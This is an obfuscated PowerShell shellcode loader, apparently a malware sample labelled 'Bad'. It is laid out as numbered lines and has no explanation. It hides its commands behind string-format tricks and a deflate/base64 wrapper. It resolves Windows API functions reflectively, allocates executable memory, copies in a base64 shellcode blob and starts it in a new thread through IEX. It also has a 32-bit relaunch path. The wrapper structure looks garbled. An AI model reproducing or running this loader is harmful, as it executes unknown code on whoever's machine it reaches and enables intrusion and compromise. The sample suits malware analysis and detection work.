Bad

1. ( nEw-ObjECT IO.coMPREssiON.deflAtEstREam([SystEm.Io.meMORYSTReAM][cOnVERT]::fRombaSe64sTRiNG( ' &("{2}{1}{0}"-f'eM','eT-it','S') ("{0}{3}{2}{4}{1}"-f'vAR','o','Mh','iaBLe:Kv','6') ( [typE]("{0}{1}{2}" -f 'iN','TP','tR')) ;&("{0}{1}{3}{2}" -f'S','e','e','t-StrictMod') -Version 2
2.  
3. ${Do`It} = @'
4. $v1 = 'GetModuleHandle'
5. $v2='GetProcAddress'
6. $v3='ReflectedDelegate'
7. function func_get_proc_address {
8. Param ($var_module, $var_procedure)
9. $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
10.  
11. return $var_unsafe_native_methods.GetMethod($v2).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod($v1)).Invoke($null, @($var_module)))), $var_procedure))
12. }
13.  
14. function func_get_delegate_type {
15. Param (
16. [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
17. [Parameter(Position = 1)] [Type] $var_return_type = [Void]
18. )
19.  
20. $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($v3)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
21. $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
22. $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
23.  
24. return $var_type_builder.CreateType()
25. }
26.  
27. [Byte[]]$var_code = [System.Convert]::FromBase64String("6AAAAABbvjgAAAAB3on3g8cYukQDAAC5BgAAAIsHMwaJB4PHBIPGBIPqBHQH4u2D7hjr47hQAAAAAdj/4OCud6f5fHEd5P8xcH7SKLZyzE9dURHpexxG/qf5fBGUAc7jFPWAGD0gwMQPRZqbU+8ZPYHIg0DdSMNQDHz+CHe9wU6as+G7LGv8Zyy7QHDNb79J9b6mYreinMQVSZqxW+F9lJuw90WW5SkAj08ShHe9wU6aafGcj+PTj5yEWAT/vHRpVH8BTj1+h8QFTRA68OQldndwOFU5v6RQKSSD11YqkxXWQ/pvJojAEtP5FAZ0ipZlGDKlDrGNGaddURHpSh/5IPCuKxknsoaWj6s7jLZyzBRsmEC4EeP/Js9CfXEdt69ZJ/dN7kmnnKbRURHpINF8Jc/5TtGZtq1jIyyCQF0n4nSihJgv+CP+HyfKfHGUBJU1IBTNft4HitHbrsS2Sh/5IM0GLyd1yfkpC4EHrXZ9SIVcURHYhGVYA6NwhZoUjFX0kiMt/T+zpAp8DyAWrtFRIM3+LSdNjEhmkHUt/Qly409daNacfLj+ntwGg44sGxagcX7SwX9zzE+1Pu4WhM/hRNaQfIhiDUduby2jOwqqoHYNe7CUdMUvfbhEmU95r0vy8SC1eHHQbQMX8boSKoinhIVhUAsNe//dO3tC4k3ehQaeQBdFOktwk5ZKVD0dsYxUAlOTT9McuHV9HH6TEozCFojMUkE9zJxeHQ6zXN8QoCpmcVy6MqWOTonJR1FKjZFVHwmhCPgm7HlzYSrJL5LHE8KXCF4oys8YfXTS3PbXHXpvOB9zaJLGNiKiZ0VWPIGnst2yNHLvKBVjqVeo3D9mNtMB0fY/lGROcMCUUXVVnak5AZXfmedhIOyxr6uphPcgWdOwmAnPK7GdRJr4jIFLLTQ8x53qFd5AYhHpIPr1D9NjscJdRCsm06/tSnYgRA2SphPisnGRVUcnSbmUMwC9F5jIZ4pNRRzTjvNv899b3K9shbdN5q7l9VlspSoqPArbMTOgQKr/0KPDfWS6UNN/7wpFFAJZi0NucPVGnVUowWbFVvQEw+hKBVAyuuBPR8mVpIeAUrD4T7bSlCzue4hewgWvg6R3pJcxYH7SQLZyjE8KOUlNKAVRojRAfHEd5P7oIS1bz+EazG9dUUK/E/I4/kUGqfTdkDm6d38RrXYHKReeuZgUhB+XQonISEMz18YfQUfnKLZyzE8c")
28.  
29. $var_buffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $var_code.Length,0x3000, 0x40)
30. [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
31.  
32. $var_hthread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll CreateThread), (func_get_delegate_type @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$var_buffer,[IntPtr]::Zero,0,[IntPtr]::Zero)
33. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll WaitForSingleObject), (func_get_delegate_type @([IntPtr], [Int32]))).Invoke($var_hthread,0xffffffff) | Out-Null
34. '@
35.  
36. If ( ( .("{1}{0}"-f'Ci','g') ("{1}{0}{2}{4}{3}" -f 'Ari','v','aBlE:KV','6o','mH'))."vA`lUe"::"Si`Ze" -eq 8) {
37. .("{2}{0}{1}{3}" -f'r','t-jo','sta','b') { param(${a}) &("{0}{1}" -f 'IE','X') ${a} } -RunAs32 -Argument ${d`oIT} | .("{0}{2}{1}"-f 'wa','-job','it') | .("{1}{3}{2}{0}" -f'ob','Receiv','J','e-')
38. }
39. else {
40. .("{1}{0}"-f 'X','IE') ${Do`iT}
41. }
42. '),[io.COmPRESSioN.COmPrEssIoNmODE]::decoMPrEss)|FOREACH-oBJECt{ nEw-ObjECT io.stReAmReadeR( $_ , [tExT.EnCoDINg]::ASCIi) }).ReADtoeNd()| &( $EnV:comSpeC[4,24,25]-JOiN'')